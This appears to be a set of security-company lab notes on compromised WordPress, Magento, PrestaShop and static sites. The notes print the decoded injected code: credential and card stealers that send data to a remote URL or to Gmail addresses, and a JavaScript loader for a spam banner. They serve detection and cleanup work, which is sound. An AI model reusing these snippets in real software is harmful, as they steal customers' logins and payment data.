Category: Uncategorized

From the hacker’s perspective, maintaining access to a compromised website for as long as possible, is ideal. One way to achieve this goal, is by stealing user’s credentials. This method also could provide the chance to spread the attack across other platforms, in case the user has the same password on other services, like email for example.

Once the attackers inject the code into the site, they must send the stolen data somewhere. It could be either stored on a local file, or sent remotely to an email address or another server.

During an Incident response investigation, we identified such malicious codes sending the credentials to a remote website controlled by the attacker. This code was very interesting because it didn’t use the regular methods, like the mail() function, or creating a curl request. Instead, attackers used file_get_contents().

The following snippet was found inside the wp-login.php file:

...if ( !is_wp_error($user) && !$reauth ) {    file_get_contents(base64_decode('aHh4cDovvL2luZm<REMOVED CONTENT>/dXJsPQ==')   .$_SERVER['HTTP_HOST'].'&user='.$_POST['log'].'&pwd='.$_POST['pwd']);    if ( $interim_login ) {...

The malicious code is just one line long making it difficult to spot by the untrained eye on a complex file like wp-login.php. The base64 encoded string is translated to "hxxp://infected-site.com/getpwd.php?url=", the hacker-controlled site.

The ‘wp-login.php’ is a WordPress core file and it shouldn’t have any modification from its original version (unless the WordPress provides an official update to it).

Using a File Integrity Monitoring System may help you on detecting these modifications and take all the necessary actions to prevent further damage to your website online presence. We also recommend having a Website Firewall Application in place to prevent brute force and unauthorized access to your back-end interface.

Recently, during an incident response process, we have found an advertisement floating banner on specific pages of an html-based website. Despite what people think, these websites are also targets of attacks and can be infected.

Different from other platforms, the entry point in this scenario is easier to be detected due to the nature of html-based pages (static content) and the reduced number of components that could make the website prone to a particular vulnerability.

The following banner was inadvertently added into the victim’s website and floating through different pages:

After a quick investigation, we found that it was being triggered by the following code:

 <script>    (function(d, s, id) {       var js, fjs = d.getElementsByTagName(s)[0];       if (d.getElementById(id)) return;       js = d.createElement(s);       js.id = id;       js.src = "//cdn[.]googletoolservices[.]com/jquery-ui[.]js";       fjs.parentNode.insertBefore(js, fjs);    }(document, 'script', 'jquery-uisdk'));</script>

The code above is just the first stage of the attack. It accesses the website: cdn[.]googletoolservices[.]com/jquery-ui[.]js and fetches the malicious payload, which is obfuscated with JS Packer compression. After deobfuscating it, we get this script:

var x113110_hit;if (typeof(x113110_hit) == "undefined") {<    (function() {       var params = {};...       var args = '';       for (var i in params) {           if (args != '') {               args += '&'           }           args += i + '=' + encodeURIComponent(params[i])       }       var st = document.createElement('script');       st.type = 'text/javascript';       st.async = true;       st.charset = 'utf-8';       st.src = '//cdn[.]googletoolservices[.]com/jquery[.]js?' + args;       var s = document.getElementsByTagName('script')[0];       s.parentNode.insertBefore(st, s);       x113110_hit = true    })()}

Which renders out the image-based floating banner, leading to an adult toys website when clicking on it (hxxp://www.la-pareja.com/?qn).

This malware could be injected in several pages of the website but not necessarily in all of them, so it’s important to check all html pages for that particular code and more specifically the link

‘cdn[.]googletoolservices[.]com/jquery-ui[.]js’.

If you’re experiencing similar issues in your website and want it to be cleaned up, let us know.

Recently we found another variant of malware that intercepts the credit card data injected into PayPal payment method “app/code/core/Mage/Paypal/Model/Direct.php”.

 $setXBodyText = 'First name : '.trim($order->getBillingAddress()->getFirstname()).'<br>';$setXBodyText .= 'Last name : '.trim($order->getBillingAddress()->getLastname()).'<br>';$setXBodyText .= 'Address : '.trim($order->getBillingAddress()->getStreet(1)).'<br>';$setXBodyText .= 'Address2 : '.trim($order->getBillingAddress()->getStreet(2)).'<br>';$setXBodyText .= 'City : '.trim($order->getBillingAddress()->getCity()).'<br>';$setXBodyText .= 'Phone : '.trim($order->getBillingAddress()->getTelephone()).'<br>';$setXBodyText .= 'Country : '.trim($order->getBillingAddress()->getCountry()).'<br>';$setXBodyText .= 'State : '.trim($order->getBillingAddress()->getRegion()).'<br>';$setXBodyText .= 'Zipcode : '.trim($order->getBillingAddress()->getPostcode()).'<br>';$setXBodyText .= 'Email : '.trim($order->getBillingAddress()->getEmail()).'<br>';if($payment->getCcOwner()){$setXBodyText .= 'name on card : '.trim($payment->getCcOwner()).'<br>';}$setXBodyText .= 'Credit Card Type : '.trim($payment->getCcType()).'<br>';           $setXBodyText .= 'Card number : '.trim($payment->getCcNumber()).'<br>';$setXBodyText .= 'Exp date : '.trim($payment->getCcExpMonth()).trim($payment->getCcExpYear()).'<br>';$setXBodyText .= 'CVV2 : '.trim($payment->getCcCid());$setXBodyTextEncripted = @eval(gzinflate(base64_decode(str_rot13(strrev('=RDe0b0XFAxXGWCavf0<CONTENT REMOVED>F2mPlW7DYX9FlhxjH')))));

Decoding that last part we  understand that all stolen information is sent to a gmail account:

$StoresThisName = $_SERVER['SERVER_NAME'];mail('g<CONTENT REMOVED>a@gmail.com',"Authorize Direct $StoresThisName", $setXBodyText);

When checking the e-mail against our malware samples database, we identified that this is not the first time it is used to receive stolen information from e-commerce solutions.

The following sample is another injection technique used by the same attacker (or group, based on e-mail address). This time around, they intercepted the onepage checkout module to inject the code (“app/code/core/Mage/Checkout/Model/Type/Onepage.php”):

eval(gzinflate(base64_decode(str_rot13(strrev('=8j52gl334pv3DXrlwgB2LcqOBIFIxlFS<CONTENT REMOVED>VrIdKNIPFHIRjq6zinVRjbgwoKMa')))));

This is what we get after decoding it:

$what = '---------------------';$send = array('Payment Method' => $data['method'],'Billing Name' => $this->getQuote()->getBillingAddress()->getFirstname() . " " . $this->getQuote()->getBillingAddress()->getLastname(),'Billing Email' => $this->getQuote()->getBillingAddress()->getEmail(),'Billing Address 1' => $this->getQuote()->getBillingAddress()->getStreet(1),'Billing Address 2' => $this->getQuote()->getBillingAddress()->getStreet(2),'Billing City' => $this->getQuote()->getBillingAddress()->getCity(),'Billing State' => $this->getQuote()->getBillingAddress()->getRegion(),'Billing PostCode' => $this->getQuote()->getBillingAddress()->getPostcode(),'Billing Country' => $this->getQuote()->getBillingAddress()->getCountry(),'Billing Phone' => $this->getQuote()->getBillingAddress()->getTelephone(),'Billing Tax' => $this->getQuote()->getBillingAddress()->getTaxvat() or "NULL",'CC Owner' => $data['cc_owner'],'CC Type' => $data['cc_type'],'CC Number' => $data['cc_number'],'CC Start' => trim(sprintf('%02d%02d', $data['cc_ss_start_month'], substr($data['cc_ss_start_year'], strlen($data['cc_ss_start_year']) - 2))),'CC Expired' => trim(sprintf('%02d%02d', $data['cc_exp_month'], substr($data['cc_exp_year'], strlen($data['cc_exp_year']) - 2))),'CC Sec' => $data['cc_cid'],'Account Gender' => $this->getQuote()->getBillingAddress()->getGender() or "NULL",'Account DOB' => $this->getQuote()->getBillingAddress()->getDob() or "NULL",'Account Password' => $this->getQuote()->getBillingAddress()->getCustomerPassword() or "NULL",'IP Address' => trim(getenv('REMOTE_ADDR')),'Web Store' => trim($_SERVER['SERVER_NAME']));$numb = trim($data['cc_number']);$mail = trim($this->getQuote()->getBillingAddress()->getEmail());if($numb != NULL) $what = "$numb - Payment Report";else $what = "Payment Report - $mail";foreach ($send as $param => $value) { $send .= "$param = $valuern";}$data .= @substr($send, 5, -1);@mail('g<CONTENT REMOVED>a@gmail.com', $what, $data);

Hacking into Magento sites and injecting code to steal payment information is very profitable and it’s the biggest trend we are seeing in 2016. It is interesting enough to notice that the same group is being responsible for several attacks.

It's never enough to stress that you should keep your site secure and ensure that all data sent to your website is kept safe at all times, specially if you process payments, usual in e-commerce solutions.

A few weeks ago, we posted a lab notes describing a good theme file being exploited by attackers to send mass-mailing SPAM (https://labs.sucuri.net/?note=2016/08/15 0:00). Upon further investigation, we identified that attackers have been exploiting this issue for quite awhile and apparently under the radar.

The lack of security checks in that particular file allows the attackers to send as many emails as they would like to, depending on server’s configurations/limitations. To make matters worse, the code had been implemented throughout different themes developed by the same company.

The issue is located within the file ‘functions/theme-mail.php’ and can be found in older versions of the following premium themes:

bretheon, doover, fingerprints, kora, lawcenter_two,mfl, pindol, tisson, almet, caffeine, nollie, limuso

The consequences of using those old versions vary - from having your website suspended by the hosting company, or getting the mail server blacklisted.

We didn’t have access to all versions of those themes to determine when a patch had been applied, but if you identify the same snippet as we have in the labs sucuri notes, we highly recommend adding the following code after your opening php tags to prevent direct access to the file and further exploitation:

if ( basename($_SERVER['PHP_SELF']) == basename(__FILE__) ){die('Access Denied');}

If you’re a customer on the Sucuri Firewall you are already patched via our virtual patching engine.

Lately, we’ve noticed an increase of login credentials stealing attempts and techniques targeting e-commerce based websites. These websites usually have sensitive information (credit card & back-end credentials) that would allow attackers to take advantage of the information & infected website.

This post will uncover a different technique being used against PrestaShop solutions. The technique varies from the one we described in this blog post here.

In this case, attackers also used the ‘./controllers/admin/AdminLoginController.php’ file but they injected a different malicious code:

eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));

Here is the decoded version of the malicious code:

<?phpif(function_exists("mail")){    $listo = array( 'eNyong' => 'a<removed>@<removed>mail.com', 'Dowoh' => 'm<removed>l@<removed>mail.com');    foreach($listo as $ming => $imel){        mail($imel,'Setoran Admin '.$_SERVER['HTTPHOST'].' ^^',"Kye Pak $ming,nnNama: ".$employee->firstname." ".$employee->lastname."nEmail: $emailnPassword: $passwd");    }}else{$f=fopen('uspas.txt','a');fwrite($f,"imel:$email | pass: $passwdn");fclose($f);}?>

The attackers used an interesting conditional statement that would give them the information they were after regardless of server limitations. In other words, they were checking if the server had mailing capabilities to send all the sensitive data to a specific address but if it didn’t, it would simply write into the system a file called ‘uspas.txt’ with the username and password.

From there attackers could just choose between checking the e-mail or accessing the .txt file into the victim’s website.

In case of a compromise, we should consider that all user accounts and their personal information were stolen, therefore it’s recommended changing all passwords from the back-end, cPanel, SFTP and other connection mechanisms that could give attackers any leverage.

Business’s reputation can be damaged if any sensitive information or unauthorized use of customer’s credits card information fall into the wrong hands, therefore keeping good security practices, such as having a File Integrity Monitoring, Web Application Firewall and other methods will help reducing the risks of infection.

While investigating a compromised Magento-based ecommerce website, we found a malicious code that’s being used to steal and maintain unauthorized access to user accounts.

This malicious code was found inside the ./app/code/core/Mage/Admin/Model/Session.php core file and it’s posting the stolen credentials to a malicious URL every time a user tries to log into their own account:

$post = $_SERVER['HTTP_HOST']."=".base64_encode(json_encode(array($username,$password,$
user->getEmail(),Mage::helper('core/url')->getCurrentUrl())));$ch = curl_init();curl_setopt($ch,CURLOPT_URL, base64_decode(REMOVED MALICIOUS CODE));curl_setopt($ch,CURLOPT_POST, 1);curl_setopt($ch,CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_TIMEOUT, 20);$output = curl_exec($ch);curl_close($ch);

The above malicious code is sending and posting the stolen username & password to the encoded URL in that part of the code: base64_decode(REMOVED MALICIOUS CODE));

This is a base64_decode code and in that case it was sending and posting the information to this malicious URL:

http://infected-site.com/404.php

Customer personal information (including their full name, email address, physical address which may also have any stored credit cards and payment information) are considered to be compromised and leaked.

The hacker may also redirect the payments to their own PayPal account or to any other payment gateways to steal money too, as long as they have full control over the administration panel of the Magento website.

Such attacks may have a severe and negative impact on your business reputation and customer's trust.

It’s always a good practice to keep your website updated and properly maintained as well as using applications, themes, and extensions/plugins from trusted sources only.

It’s time now to secure your website from hackers!

It’s quite common for attackers to compromise your website and make use of it for their phishing campaigns. The most typical method they use is to simply place redirects throughout your site or simply upload entire phishing folders so that your website becomes an actual phishing platform.

When the hosting finds any bad content there they usually take the swiftest action and just suspend your service until the matter is resolved. But what if the compromise started at a different level? Let’s say, the server’s error documents?

Recently, we came across a very similar situation. The curious point is that the attackers predicted the domains would eventually be suspended so they promptly changed the template for suspended websites directly through the WHM panel.

Even though the website was suspended and its content inaccessible, infecting the suspended template enabled the redirect to the phishing domain.

These phishing campaigns impact directly on a website’s reputation and can easily lead to blacklists and great drops in your SEO rankings.

Website suspension may not always be enough to fix issues resulted from a compromise, especially when the compromise happens directly on your hosting provider and the attacker has access to your cPanel / WHM.

Once a compromise is detected, we always recommend changing all passwords (database, back-end interfaces, cPanel, FTP/SFTP), keeping regular backups to restore the website to a clean state, and reduce the impacts on your business by adding a File Integrity Monitoring System and a Website Firewall to prevent attacks.